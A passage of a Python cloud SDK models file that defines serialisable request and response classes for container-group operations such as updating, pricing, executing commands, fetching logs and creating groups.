        self.environment_var = [UpdateContainerGroupRequestContainerEnvironmentVar().from_map(k) for k in raw] if raw is not None else None
        raw = map.get('Port')
        self.port = [UpdateContainerGroupRequestContainerPort().from_map(k) for k in raw] if raw is not None else None
        raw = map.get('VolumeMount')
        self.volume_mount = [UpdateContainerGroupRequestContainerVolumeMount().from_map(k) for k in raw] if raw is not None else None
        raw = map.get('ReadinessProbe')
        self.readiness_probe = UpdateContainerGroupRequestContainerReadinessProbe().from_map(raw) if raw is not None else None
        raw = map.get('LivenessProbe')
        self.liveness_probe = UpdateContainerGroupRequestContainerLivenessProbe().from_map(raw) if raw is not None else None
        raw = map.get('SecurityContext')
        self.security_context = UpdateContainerGroupRequestContainerSecurityContext().from_map(raw) if raw is not None else None
        self.gpu = map.get('Gpu')
        return self
class UpdateContainerGroupRequestInitContainerEnvironmentVar(TeaModel):
    """An environment variable (key/value) for an init container."""
    def __init__(self, key=None, value=None):
        self.key, self.value = key, value

    def validate(self):
        pass

    def to_map(self):
        return {'Key': self.key, 'Value': self.value}

    def from_map(self, map={}):
        self.key, self.value = map.get('Key'), map.get('Value')
        return self
class UpdateContainerGroupRequestInitContainerPort(TeaModel):
    """An exposed init-container port; the protocol is required."""
    def __init__(self, port=None, protocol=None):
        self.port, self.protocol = port, protocol

    def validate(self):
        self.validate_required(self.protocol, 'protocol')

    def to_map(self):
        return {'Port': self.port, 'Protocol': self.protocol}

    def from_map(self, map={}):
        self.port, self.protocol = map.get('Port'), map.get('Protocol')
        return self
class UpdateContainerGroupRequestInitContainerVolumeMount(TeaModel):
    """A volume mount inside an init container."""
    def __init__(self, name=None, mount_path=None, sub_path=None, read_only=None):
        self.name = name
        self.mount_path = mount_path
        self.sub_path = sub_path
        self.read_only = read_only

    def validate(self):
        pass

    def to_map(self):
        return {
            'Name': self.name,
            'MountPath': self.mount_path,
            'SubPath': self.sub_path,
            'ReadOnly': self.read_only,
        }

    def from_map(self, map={}):
        for attr, key in (('name', 'Name'), ('mount_path', 'MountPath'),
                          ('sub_path', 'SubPath'), ('read_only', 'ReadOnly')):
            setattr(self, attr, map.get(key))
        return self
class UpdateContainerGroupRequestInitContainerSecurityContextCapability(TeaModel):
    """Linux capabilities to add to an init container's security context."""
    def __init__(self, add=None):
        # Bug fix: `add` was previously ignored and the field was always
        # reset to []. Honor the caller-supplied list.
        self.add = [] if add is None else add

    def validate(self):
        self.validate_required(self.add, 'add')

    def to_map(self):
        """Serialize to the wire-format dict (PascalCase keys)."""
        return {'Add': list(self.add) if self.add is not None else None}

    def from_map(self, map=None):
        """Deserialize from a wire-format dict; returns self."""
        map = {} if map is None else map  # avoid shared mutable default
        raw = map.get('Add')
        self.add = list(raw) if raw is not None else None
        return self
class UpdateContainerGroupRequestInitContainerSecurityContext(TeaModel):
    """Init-container security settings: root-FS flag, run-as user, capabilities."""
    def __init__(self, read_only_root_filesystem=None, run_as_user=None, capability=None):
        self.read_only_root_filesystem = read_only_root_filesystem
        self.run_as_user = run_as_user
        self.capability = capability

    def validate(self):
        self.validate_required(self.capability, 'capability')
        if self.capability:
            self.capability.validate()

    def to_map(self):
        cap = self.capability.to_map() if self.capability is not None else None
        return {
            'ReadOnlyRootFilesystem': self.read_only_root_filesystem,
            'RunAsUser': self.run_as_user,
            'Capability': cap,
        }

    def from_map(self, map={}):
        self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
        self.run_as_user = map.get('RunAsUser')
        raw = map.get('Capability')
        self.capability = UpdateContainerGroupRequestInitContainerSecurityContextCapability().from_map(raw) if raw is not None else None
        return self
class UpdateContainerGroupRequestInitContainer(TeaModel):
    """One init-container definition in an UpdateContainerGroup request."""
    def __init__(self, name=None, image=None, cpu=None, memory=None, working_dir=None, image_pull_policy=None, stdin=None, stdin_once=None, tty=None, command=None, arg=None, environment_var=None, port=None, volume_mount=None, security_context=None, gpu=None):
        self.name = name
        self.image = image
        self.cpu = cpu
        self.memory = memory
        self.working_dir = working_dir
        self.image_pull_policy = image_pull_policy
        self.stdin = stdin
        self.stdin_once = stdin_once
        self.tty = tty
        # Bug fix: the list arguments (command, arg, environment_var, port,
        # volume_mount) were previously ignored and the fields were always
        # reset to []. Honor caller-supplied lists.
        self.command = [] if command is None else command
        self.arg = [] if arg is None else arg
        self.environment_var = [] if environment_var is None else environment_var
        self.port = [] if port is None else port
        self.volume_mount = [] if volume_mount is None else volume_mount
        self.security_context = security_context
        self.gpu = gpu

    def validate(self):
        """Require the list/model fields and validate nested models."""
        self.validate_required(self.command, 'command')
        self.validate_required(self.arg, 'arg')
        for items, label in ((self.environment_var, 'environment_var'),
                             (self.port, 'port'),
                             (self.volume_mount, 'volume_mount')):
            self.validate_required(items, label)
            if items:
                for k in items:
                    if k:
                        k.validate()
        self.validate_required(self.security_context, 'security_context')
        if self.security_context:
            self.security_context.validate()

    def to_map(self):
        """Serialize to the wire-format dict (PascalCase keys)."""
        result = {}
        result['Name'] = self.name
        result['Image'] = self.image
        result['Cpu'] = self.cpu
        result['Memory'] = self.memory
        result['WorkingDir'] = self.working_dir
        result['ImagePullPolicy'] = self.image_pull_policy
        result['Stdin'] = self.stdin
        result['StdinOnce'] = self.stdin_once
        result['Tty'] = self.tty
        result['Command'] = list(self.command) if self.command is not None else None
        result['Arg'] = list(self.arg) if self.arg is not None else None
        result['EnvironmentVar'] = [k.to_map() if k else None for k in self.environment_var] if self.environment_var is not None else None
        result['Port'] = [k.to_map() if k else None for k in self.port] if self.port is not None else None
        result['VolumeMount'] = [k.to_map() if k else None for k in self.volume_mount] if self.volume_mount is not None else None
        result['SecurityContext'] = self.security_context.to_map() if self.security_context is not None else None
        result['Gpu'] = self.gpu
        return result

    def from_map(self, map=None):
        """Deserialize from a wire-format dict; returns self."""
        map = {} if map is None else map  # avoid shared mutable default
        self.name = map.get('Name')
        self.image = map.get('Image')
        self.cpu = map.get('Cpu')
        self.memory = map.get('Memory')
        self.working_dir = map.get('WorkingDir')
        self.image_pull_policy = map.get('ImagePullPolicy')
        self.stdin = map.get('Stdin')
        self.stdin_once = map.get('StdinOnce')
        self.tty = map.get('Tty')
        raw = map.get('Command')
        self.command = list(raw) if raw is not None else None
        raw = map.get('Arg')
        self.arg = list(raw) if raw is not None else None
        raw = map.get('EnvironmentVar')
        self.environment_var = [UpdateContainerGroupRequestInitContainerEnvironmentVar().from_map(k) for k in raw] if raw is not None else None
        raw = map.get('Port')
        self.port = [UpdateContainerGroupRequestInitContainerPort().from_map(k) for k in raw] if raw is not None else None
        raw = map.get('VolumeMount')
        self.volume_mount = [UpdateContainerGroupRequestInitContainerVolumeMount().from_map(k) for k in raw] if raw is not None else None
        raw = map.get('SecurityContext')
        self.security_context = UpdateContainerGroupRequestInitContainerSecurityContext().from_map(raw) if raw is not None else None
        self.gpu = map.get('Gpu')
        return self
class UpdateContainerGroupRequestImageRegistryCredential(TeaModel):
    """Credentials for a private image registry (server, user, password)."""
    def __init__(self, server=None, user_name=None, password=None):
        self.server, self.user_name, self.password = server, user_name, password

    def validate(self):
        pass

    def to_map(self):
        return {'Server': self.server, 'UserName': self.user_name, 'Password': self.password}

    def from_map(self, map={}):
        self.server = map.get('Server')
        self.user_name = map.get('UserName')
        self.password = map.get('Password')
        return self
class UpdateContainerGroupResponse(TeaModel):
    """Response of UpdateContainerGroup: only the request id."""
    def __init__(self, request_id=None):
        self.request_id = request_id

    def validate(self):
        self.validate_required(self.request_id, 'request_id')

    def to_map(self):
        return {'RequestId': self.request_id}

    def from_map(self, map={}):
        self.request_id = map.get('RequestId')
        return self
class DescribeContainerGroupPriceRequest(TeaModel):
    """Request for DescribeContainerGroupPrice; region_id is required."""
    # (attribute, wire key) pairs shared by to_map/from_map.
    _FIELDS = (('region_id', 'RegionId'), ('cpu', 'Cpu'), ('memory', 'Memory'),
               ('instance_type', 'InstanceType'), ('spot_strategy', 'SpotStrategy'),
               ('zone_id', 'ZoneId'), ('spot_price_limit', 'SpotPriceLimit'))

    def __init__(self, region_id=None, cpu=None, memory=None, instance_type=None, spot_strategy=None, zone_id=None, spot_price_limit=None):
        self.region_id = region_id
        self.cpu = cpu
        self.memory = memory
        self.instance_type = instance_type
        self.spot_strategy = spot_strategy
        self.zone_id = zone_id
        self.spot_price_limit = spot_price_limit

    def validate(self):
        self.validate_required(self.region_id, 'region_id')

    def to_map(self):
        return {key: getattr(self, attr) for attr, key in self._FIELDS}

    def from_map(self, map={}):
        for attr, key in self._FIELDS:
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupPriceResponse(TeaModel):
    """Response of DescribeContainerGroupPrice: request id plus price info."""
    def __init__(self, request_id=None, price_info=None):
        self.request_id = request_id
        self.price_info = price_info

    def validate(self):
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.price_info, 'price_info')
        if self.price_info:
            self.price_info.validate()

    def to_map(self):
        info = self.price_info.to_map() if self.price_info is not None else None
        return {'RequestId': self.request_id, 'PriceInfo': info}

    def from_map(self, map={}):
        self.request_id = map.get('RequestId')
        raw = map.get('PriceInfo')
        self.price_info = DescribeContainerGroupPriceResponsePriceInfo().from_map(raw) if raw is not None else None
        return self
class DescribeContainerGroupPriceResponsePriceInfoRulesRule(TeaModel):
    """A pricing rule: id plus human-readable description; both required."""
    def __init__(self, rule_id=None, description=None):
        self.rule_id, self.description = rule_id, description

    def validate(self):
        self.validate_required(self.rule_id, 'rule_id')
        self.validate_required(self.description, 'description')

    def to_map(self):
        return {'RuleId': self.rule_id, 'Description': self.description}

    def from_map(self, map={}):
        self.rule_id = map.get('RuleId')
        self.description = map.get('Description')
        return self
class DescribeContainerGroupPriceResponsePriceInfoRules(TeaModel):
    """Container for the list of pricing rules."""
    def __init__(self, rule=None):
        # Bug fix: `rule` was previously ignored and the field was always
        # reset to []. Honor the caller-supplied list.
        self.rule = [] if rule is None else rule

    def validate(self):
        """Require the list and validate each non-None entry."""
        self.validate_required(self.rule, 'rule')
        if self.rule:
            for k in self.rule:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize to the wire-format dict (PascalCase keys)."""
        if self.rule is not None:
            return {'Rule': [k.to_map() if k else None for k in self.rule]}
        return {'Rule': None}

    def from_map(self, map=None):
        """Deserialize from a wire-format dict; returns self."""
        map = {} if map is None else map  # avoid shared mutable default
        raw = map.get('Rule')
        if raw is not None:
            self.rule = [DescribeContainerGroupPriceResponsePriceInfoRulesRule().from_map(k) for k in raw]
        else:
            self.rule = None
        return self
class DescribeContainerGroupPriceResponsePriceInfoSpotPricesSpotPrice(TeaModel):
    """One spot-price quote: zone, instance type, spot price and origin price."""
    def __init__(self, zone_id=None, instance_type=None, spot_price=None, origin_price=None):
        self.zone_id = zone_id
        self.instance_type = instance_type
        self.spot_price = spot_price
        self.origin_price = origin_price

    def validate(self):
        # Every field on this model is required.
        for value, name in (
            (self.zone_id, 'zone_id'),
            (self.instance_type, 'instance_type'),
            (self.spot_price, 'spot_price'),
            (self.origin_price, 'origin_price'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        return {
            'ZoneId': self.zone_id,
            'InstanceType': self.instance_type,
            'SpotPrice': self.spot_price,
            'OriginPrice': self.origin_price,
        }

    def from_map(self, map={}):
        for attr, key in (
            ('zone_id', 'ZoneId'),
            ('instance_type', 'InstanceType'),
            ('spot_price', 'SpotPrice'),
            ('origin_price', 'OriginPrice'),
        ):
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupPriceResponsePriceInfoSpotPrices(TeaModel):
    """Wrapper model for the list of spot-price quotes under 'SpotPrice'.

    Fix: the generated __init__ ignored its `spot_price` argument and always
    reset the field to an empty list; it now honors a caller-supplied list
    while keeping the historical [] default when omitted.
    """
    def __init__(self, spot_price=None):
        # Honor the constructor argument; None keeps the old [] default.
        self.spot_price = [] if spot_price is None else spot_price

    def validate(self):
        self.validate_required(self.spot_price, 'spot_price')
        if self.spot_price:
            for k in self.spot_price:
                if k:
                    k.validate()

    def to_map(self):
        result = {}
        if self.spot_price is not None:
            result['SpotPrice'] = [k.to_map() if k else None for k in self.spot_price]
        else:
            result['SpotPrice'] = None
        return result

    def from_map(self, map={}):
        raw = map.get('SpotPrice')
        if raw is not None:
            self.spot_price = [
                DescribeContainerGroupPriceResponsePriceInfoSpotPricesSpotPrice().from_map(k)
                for k in raw
            ]
        else:
            self.spot_price = None
        return self
class DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfoRulesRule(TeaModel):
    """Rule entry attached to a price detail: id plus description."""
    def __init__(self, rule_id=None, description=None):
        self.rule_id = rule_id
        self.description = description

    def validate(self):
        # Both fields are required.
        for value, name in ((self.rule_id, 'rule_id'), (self.description, 'description')):
            self.validate_required(value, name)

    def to_map(self):
        return {'RuleId': self.rule_id, 'Description': self.description}

    def from_map(self, map={}):
        for attr, key in (('rule_id', 'RuleId'), ('description', 'Description')):
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfoRules(TeaModel):
    """Wrapper model for a detail-info's rule list under the 'Rule' key.

    Fix: the generated __init__ ignored its `rule` argument and always reset
    the field to an empty list; it now honors a caller-supplied list while
    keeping the historical [] default when omitted.
    """
    def __init__(self, rule=None):
        # Honor the constructor argument; None keeps the old [] default.
        self.rule = [] if rule is None else rule

    def validate(self):
        self.validate_required(self.rule, 'rule')
        if self.rule:
            for k in self.rule:
                if k:
                    k.validate()

    def to_map(self):
        result = {}
        if self.rule is not None:
            result['Rule'] = [k.to_map() if k else None for k in self.rule]
        else:
            result['Rule'] = None
        return result

    def from_map(self, map={}):
        raw = map.get('Rule')
        if raw is not None:
            self.rule = [
                DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfoRulesRule().from_map(k)
                for k in raw
            ]
        else:
            self.rule = None
        return self
class DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfo(TeaModel):
    """Per-resource price detail: original/discount/trade price plus its rules."""
    def __init__(self, resource=None, original_price=None, discount_price=None, trade_price=None, rules=None):
        self.resource = resource
        self.original_price = original_price
        self.discount_price = discount_price
        self.trade_price = trade_price
        self.rules = rules

    def validate(self):
        # All fields are required; the nested rules model validates recursively.
        for value, name in (
            (self.resource, 'resource'),
            (self.original_price, 'original_price'),
            (self.discount_price, 'discount_price'),
            (self.trade_price, 'trade_price'),
            (self.rules, 'rules'),
        ):
            self.validate_required(value, name)
        if self.rules:
            self.rules.validate()

    def to_map(self):
        return {
            'Resource': self.resource,
            'OriginalPrice': self.original_price,
            'DiscountPrice': self.discount_price,
            'TradePrice': self.trade_price,
            'Rules': self.rules.to_map() if self.rules is not None else None,
        }

    def from_map(self, map={}):
        self.resource = map.get('Resource')
        self.original_price = map.get('OriginalPrice')
        self.discount_price = map.get('DiscountPrice')
        self.trade_price = map.get('TradePrice')
        raw_rules = map.get('Rules')
        if raw_rules is None:
            self.rules = None
        else:
            self.rules = DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfoRules().from_map(raw_rules)
        return self
class DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfos(TeaModel):
    """Wrapper model for the list of price details under 'DetailInfo'.

    Fix: the generated __init__ ignored its `detail_info` argument and always
    reset the field to an empty list; it now honors a caller-supplied list
    while keeping the historical [] default when omitted.
    """
    def __init__(self, detail_info=None):
        # Honor the constructor argument; None keeps the old [] default.
        self.detail_info = [] if detail_info is None else detail_info

    def validate(self):
        self.validate_required(self.detail_info, 'detail_info')
        if self.detail_info:
            for k in self.detail_info:
                if k:
                    k.validate()

    def to_map(self):
        result = {}
        if self.detail_info is not None:
            result['DetailInfo'] = [k.to_map() if k else None for k in self.detail_info]
        else:
            result['DetailInfo'] = None
        return result

    def from_map(self, map={}):
        raw = map.get('DetailInfo')
        if raw is not None:
            self.detail_info = [
                DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfo().from_map(k)
                for k in raw
            ]
        else:
            self.detail_info = None
        return self
class DescribeContainerGroupPriceResponsePriceInfoPrice(TeaModel):
    """Aggregate price: original/discount/trade amounts, currency, and details."""
    def __init__(self, original_price=None, discount_price=None, trade_price=None, currency=None, detail_infos=None):
        self.original_price = original_price
        self.discount_price = discount_price
        self.trade_price = trade_price
        self.currency = currency
        self.detail_infos = detail_infos

    def validate(self):
        # All fields required; the nested detail-infos model validates recursively.
        for value, name in (
            (self.original_price, 'original_price'),
            (self.discount_price, 'discount_price'),
            (self.trade_price, 'trade_price'),
            (self.currency, 'currency'),
            (self.detail_infos, 'detail_infos'),
        ):
            self.validate_required(value, name)
        if self.detail_infos:
            self.detail_infos.validate()

    def to_map(self):
        return {
            'OriginalPrice': self.original_price,
            'DiscountPrice': self.discount_price,
            'TradePrice': self.trade_price,
            'Currency': self.currency,
            'DetailInfos': self.detail_infos.to_map() if self.detail_infos is not None else None,
        }

    def from_map(self, map={}):
        self.original_price = map.get('OriginalPrice')
        self.discount_price = map.get('DiscountPrice')
        self.trade_price = map.get('TradePrice')
        self.currency = map.get('Currency')
        raw_infos = map.get('DetailInfos')
        if raw_infos is None:
            self.detail_infos = None
        else:
            self.detail_infos = DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfos().from_map(raw_infos)
        return self
class DescribeContainerGroupPriceResponsePriceInfo(TeaModel):
    """Top-level price info: overall rules, spot-price quotes, and the price."""
    def __init__(self, rules=None, spot_prices=None, price=None):
        self.rules = rules
        self.spot_prices = spot_prices
        self.price = price

    def validate(self):
        # Each nested model is required and then validated recursively.
        for value, name in (
            (self.rules, 'rules'),
            (self.spot_prices, 'spot_prices'),
            (self.price, 'price'),
        ):
            self.validate_required(value, name)
            if value:
                value.validate()

    def to_map(self):
        return {
            'Rules': self.rules.to_map() if self.rules is not None else None,
            'SpotPrices': self.spot_prices.to_map() if self.spot_prices is not None else None,
            'Price': self.price.to_map() if self.price is not None else None,
        }

    def from_map(self, map={}):
        raw = map.get('Rules')
        self.rules = None if raw is None else DescribeContainerGroupPriceResponsePriceInfoRules().from_map(raw)
        raw = map.get('SpotPrices')
        self.spot_prices = None if raw is None else DescribeContainerGroupPriceResponsePriceInfoSpotPrices().from_map(raw)
        raw = map.get('Price')
        self.price = None if raw is None else DescribeContainerGroupPriceResponsePriceInfoPrice().from_map(raw)
        return self
class ExecContainerCommandRequest(TeaModel):
    """Request model for ExecContainerCommand.

    Region, container-group id, container name and the command are mandatory;
    TTY and Stdin are optional flags.
    """
    def __init__(self, region_id=None, container_group_id=None, container_name=None, command=None, _tty=None, stdin=None):
        self.region_id = region_id
        self.container_group_id = container_group_id
        self.container_name = container_name
        self.command = command
        self._tty = _tty
        self.stdin = stdin

    def validate(self):
        # Only the first four fields are required.
        for value, name in (
            (self.region_id, 'region_id'),
            (self.container_group_id, 'container_group_id'),
            (self.container_name, 'container_name'),
            (self.command, 'command'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        return {
            'RegionId': self.region_id,
            'ContainerGroupId': self.container_group_id,
            'ContainerName': self.container_name,
            'Command': self.command,
            'TTY': self._tty,
            'Stdin': self.stdin,
        }

    def from_map(self, map={}):
        for attr, key in (
            ('region_id', 'RegionId'),
            ('container_group_id', 'ContainerGroupId'),
            ('container_name', 'ContainerName'),
            ('command', 'Command'),
            ('_tty', 'TTY'),
            ('stdin', 'Stdin'),
        ):
            setattr(self, attr, map.get(key))
        return self
class ExecContainerCommandResponse(TeaModel):
    """Response model for ExecContainerCommand: request id and websocket URI."""
    def __init__(self, request_id=None, web_socket_uri=None):
        self.request_id = request_id
        self.web_socket_uri = web_socket_uri

    def validate(self):
        # Both fields are required.
        for value, name in ((self.request_id, 'request_id'), (self.web_socket_uri, 'web_socket_uri')):
            self.validate_required(value, name)

    def to_map(self):
        return {'RequestId': self.request_id, 'WebSocketUri': self.web_socket_uri}

    def from_map(self, map={}):
        self.request_id = map.get('RequestId')
        self.web_socket_uri = map.get('WebSocketUri')
        return self
class DescribeContainerLogRequest(TeaModel):
    """Request model for DescribeContainerLog.

    Region, container-group id and container name are mandatory; the remaining
    fields (start time, tail, last time, since-seconds, limit-bytes) are
    optional log-window parameters.
    """
    def __init__(self, region_id=None, container_group_id=None, container_name=None, start_time=None, tail=None, last_time=None, since_seconds=None, limit_bytes=None):
        self.region_id = region_id
        self.container_group_id = container_group_id
        self.container_name = container_name
        self.start_time = start_time
        self.tail = tail
        self.last_time = last_time
        self.since_seconds = since_seconds
        self.limit_bytes = limit_bytes

    def validate(self):
        # Only the identifying fields are required.
        for value, name in (
            (self.region_id, 'region_id'),
            (self.container_group_id, 'container_group_id'),
            (self.container_name, 'container_name'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        return {
            'RegionId': self.region_id,
            'ContainerGroupId': self.container_group_id,
            'ContainerName': self.container_name,
            'StartTime': self.start_time,
            'Tail': self.tail,
            'LastTime': self.last_time,
            'SinceSeconds': self.since_seconds,
            'LimitBytes': self.limit_bytes,
        }

    def from_map(self, map={}):
        for attr, key in (
            ('region_id', 'RegionId'),
            ('container_group_id', 'ContainerGroupId'),
            ('container_name', 'ContainerName'),
            ('start_time', 'StartTime'),
            ('tail', 'Tail'),
            ('last_time', 'LastTime'),
            ('since_seconds', 'SinceSeconds'),
            ('limit_bytes', 'LimitBytes'),
        ):
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerLogResponse(TeaModel):
    """Response model for DescribeContainerLog: request id, container, content."""
    def __init__(self, request_id=None, container_name=None, content=None):
        self.request_id = request_id
        self.container_name = container_name
        self.content = content

    def validate(self):
        # All three fields are required.
        for value, name in (
            (self.request_id, 'request_id'),
            (self.container_name, 'container_name'),
            (self.content, 'content'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        return {
            'RequestId': self.request_id,
            'ContainerName': self.container_name,
            'Content': self.content,
        }

    def from_map(self, map={}):
        self.request_id = map.get('RequestId')
        self.container_name = map.get('ContainerName')
        self.content = map.get('Content')
        return self
class CreateContainerGroupRequest(TeaModel):
    """Request model for CreateContainerGroup.

    Fix: the generated __init__ silently discarded every list-typed argument
    (tag, image_registry_credential, container, volume, init_container,
    host_aliase, arn, ntp_server), always resetting those fields to []. They
    now honor a caller-supplied list while keeping the historical [] default
    when omitted. All other behavior (validation rules, map key names and
    ordering) is unchanged.
    """
    def __init__(self, region_id=None, zone_id=None, security_group_id=None, v_switch_id=None, container_group_name=None, restart_policy=None, tag=None, image_registry_credential=None, container=None, volume=None, eip_instance_id=None, init_container=None, dns_config=None, cpu=None, memory=None, resource_group_id=None, dns_policy=None, client_token=None, host_aliase=None, arn=None, instance_type=None, security_context=None, sls_enable=None, image_snapshot_id=None, ram_role_name=None, ntp_server=None, termination_grace_period_seconds=None, auto_match_image_cache=None, ipv_6address_count=None, active_deadline_seconds=None, spot_strategy=None, spot_price_limit=None, schedule_strategy=None, tenant_vswitch_id=None, tenant_security_group_id=None, core_pattern=None):
        self.region_id = region_id
        self.zone_id = zone_id
        self.security_group_id = security_group_id
        self.v_switch_id = v_switch_id
        self.container_group_name = container_group_name
        self.restart_policy = restart_policy
        # List fields: honor the argument; None keeps the old [] default.
        self.tag = [] if tag is None else tag
        self.image_registry_credential = [] if image_registry_credential is None else image_registry_credential
        self.container = [] if container is None else container
        self.volume = [] if volume is None else volume
        self.eip_instance_id = eip_instance_id
        self.init_container = [] if init_container is None else init_container
        self.dns_config = dns_config
        self.cpu = cpu
        self.memory = memory
        self.resource_group_id = resource_group_id
        self.dns_policy = dns_policy
        self.client_token = client_token
        self.host_aliase = [] if host_aliase is None else host_aliase
        self.arn = [] if arn is None else arn
        self.instance_type = instance_type
        self.security_context = security_context
        self.sls_enable = sls_enable
        self.image_snapshot_id = image_snapshot_id
        self.ram_role_name = ram_role_name
        self.ntp_server = [] if ntp_server is None else ntp_server
        self.termination_grace_period_seconds = termination_grace_period_seconds
        self.auto_match_image_cache = auto_match_image_cache
        self.ipv_6address_count = ipv_6address_count
        self.active_deadline_seconds = active_deadline_seconds
        self.spot_strategy = spot_strategy
        self.spot_price_limit = spot_price_limit
        self.schedule_strategy = schedule_strategy
        self.tenant_vswitch_id = tenant_vswitch_id
        self.tenant_security_group_id = tenant_security_group_id
        self.core_pattern = core_pattern

    def validate(self):
        def _validate_items(items):
            # Validate each non-empty element of a model list.
            if items:
                for k in items:
                    if k:
                        k.validate()
        self.validate_required(self.region_id, 'region_id')
        self.validate_required(self.security_group_id, 'security_group_id')
        self.validate_required(self.v_switch_id, 'v_switch_id')
        self.validate_required(self.container_group_name, 'container_group_name')
        _validate_items(self.tag)
        _validate_items(self.image_registry_credential)
        self.validate_required(self.container, 'container')
        _validate_items(self.container)
        _validate_items(self.volume)
        _validate_items(self.init_container)
        self.validate_required(self.dns_config, 'dns_config')
        if self.dns_config:
            self.dns_config.validate()
        _validate_items(self.host_aliase)
        _validate_items(self.arn)
        self.validate_required(self.security_context, 'security_context')
        if self.security_context:
            self.security_context.validate()

    def to_map(self):
        def _map_items(items):
            # Serialize a model list; None stays None.
            if items is None:
                return None
            return [k.to_map() if k else None for k in items]
        result = {}
        result['RegionId'] = self.region_id
        result['ZoneId'] = self.zone_id
        result['SecurityGroupId'] = self.security_group_id
        result['VSwitchId'] = self.v_switch_id
        result['ContainerGroupName'] = self.container_group_name
        result['RestartPolicy'] = self.restart_policy
        result['Tag'] = _map_items(self.tag)
        result['ImageRegistryCredential'] = _map_items(self.image_registry_credential)
        result['Container'] = _map_items(self.container)
        result['Volume'] = _map_items(self.volume)
        result['EipInstanceId'] = self.eip_instance_id
        result['InitContainer'] = _map_items(self.init_container)
        result['DnsConfig'] = self.dns_config.to_map() if self.dns_config is not None else None
        result['Cpu'] = self.cpu
        result['Memory'] = self.memory
        result['ResourceGroupId'] = self.resource_group_id
        result['DnsPolicy'] = self.dns_policy
        result['ClientToken'] = self.client_token
        result['HostAliase'] = _map_items(self.host_aliase)
        result['Arn'] = _map_items(self.arn)
        result['InstanceType'] = self.instance_type
        result['SecurityContext'] = self.security_context.to_map() if self.security_context is not None else None
        result['SlsEnable'] = self.sls_enable
        result['ImageSnapshotId'] = self.image_snapshot_id
        result['RamRoleName'] = self.ram_role_name
        # NtpServer holds plain values, not nested models.
        result['NtpServer'] = list(self.ntp_server) if self.ntp_server is not None else None
        result['TerminationGracePeriodSeconds'] = self.termination_grace_period_seconds
        result['AutoMatchImageCache'] = self.auto_match_image_cache
        result['Ipv6AddressCount'] = self.ipv_6address_count
        result['ActiveDeadlineSeconds'] = self.active_deadline_seconds
        result['SpotStrategy'] = self.spot_strategy
        result['SpotPriceLimit'] = self.spot_price_limit
        result['ScheduleStrategy'] = self.schedule_strategy
        result['TenantVSwitchId'] = self.tenant_vswitch_id
        result['TenantSecurityGroupId'] = self.tenant_security_group_id
        result['CorePattern'] = self.core_pattern
        return result

    def from_map(self, map={}):
        def _model_items(key, model_cls):
            # Deserialize a list of nested models; a missing key yields None.
            raw = map.get(key)
            if raw is None:
                return None
            return [model_cls().from_map(k) for k in raw]
        self.region_id = map.get('RegionId')
        self.zone_id = map.get('ZoneId')
        self.security_group_id = map.get('SecurityGroupId')
        self.v_switch_id = map.get('VSwitchId')
        self.container_group_name = map.get('ContainerGroupName')
        self.restart_policy = map.get('RestartPolicy')
        self.tag = _model_items('Tag', CreateContainerGroupRequestTag)
        self.image_registry_credential = _model_items('ImageRegistryCredential', CreateContainerGroupRequestImageRegistryCredential)
        self.container = _model_items('Container', CreateContainerGroupRequestContainer)
        self.volume = _model_items('Volume', CreateContainerGroupRequestVolume)
        self.eip_instance_id = map.get('EipInstanceId')
        self.init_container = _model_items('InitContainer', CreateContainerGroupRequestInitContainer)
        raw = map.get('DnsConfig')
        self.dns_config = None if raw is None else CreateContainerGroupRequestDnsConfig().from_map(raw)
        self.cpu = map.get('Cpu')
        self.memory = map.get('Memory')
        self.resource_group_id = map.get('ResourceGroupId')
        self.dns_policy = map.get('DnsPolicy')
        self.client_token = map.get('ClientToken')
        self.host_aliase = _model_items('HostAliase', CreateContainerGroupRequestHostAliase)
        self.arn = _model_items('Arn', CreateContainerGroupRequestArn)
        self.instance_type = map.get('InstanceType')
        raw = map.get('SecurityContext')
        self.security_context = None if raw is None else CreateContainerGroupRequestSecurityContext().from_map(raw)
        self.sls_enable = map.get('SlsEnable')
        self.image_snapshot_id = map.get('ImageSnapshotId')
        self.ram_role_name = map.get('RamRoleName')
        raw = map.get('NtpServer')
        self.ntp_server = None if raw is None else list(raw)
        self.termination_grace_period_seconds = map.get('TerminationGracePeriodSeconds')
        self.auto_match_image_cache = map.get('AutoMatchImageCache')
        self.ipv_6address_count = map.get('Ipv6AddressCount')
        self.active_deadline_seconds = map.get('ActiveDeadlineSeconds')
        self.spot_strategy = map.get('SpotStrategy')
        self.spot_price_limit = map.get('SpotPriceLimit')
        self.schedule_strategy = map.get('ScheduleStrategy')
        self.tenant_vswitch_id = map.get('TenantVSwitchId')
        self.tenant_security_group_id = map.get('TenantSecurityGroupId')
        self.core_pattern = map.get('CorePattern')
        return self
class CreateContainerGroupRequestTag(TeaModel):
    """A key/value tag attached to the container group."""
    def __init__(self, key=None, value=None):
        self.key = key
        self.value = value

    def validate(self):
        # Both key and value are required.
        for item, name in ((self.key, 'key'), (self.value, 'value')):
            self.validate_required(item, name)

    def to_map(self):
        return {'Key': self.key, 'Value': self.value}

    def from_map(self, map={}):
        self.key = map.get('Key')
        self.value = map.get('Value')
        return self
class CreateContainerGroupRequestImageRegistryCredential(TeaModel):
    """Registry login credential: server address, user name and password."""
    def __init__(self, server=None, user_name=None, password=None):
        self.server = server
        self.user_name = user_name
        self.password = password

    def validate(self):
        # All three fields are required.
        for value, name in (
            (self.server, 'server'),
            (self.user_name, 'user_name'),
            (self.password, 'password'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        return {
